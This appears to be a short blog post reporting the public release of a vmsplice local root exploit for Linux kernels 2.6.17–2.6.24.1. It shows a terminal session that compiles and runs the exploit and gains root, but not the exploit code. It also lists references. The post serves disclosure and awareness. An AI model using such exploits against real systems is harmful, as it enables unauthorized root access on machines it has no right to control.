Linux Kernel 2.6.17 – 2.6.24.1 vmsplice Local Root Exploit

Hacked

A proof of concept for a local root exploit to hack linux kernels between version 2.6.17 and 2.6.24.1 has been released by ‘milw0rm’. I guess I won’t be the only one who says “feck…” to this.

$ gcc exploit.c -o exploit
$ whoami
heikki
$ ./exploit
———————————–
Linux vmsplice Local Root Exploit
By qaaz
———————————–
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7d90000 .. 0xb7dc2000
[+] root
$ whoami
root
Kernel 2.6.22-14-generic

References:
LKML
milw0rm.com
Launchpad
Debian Bugs

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.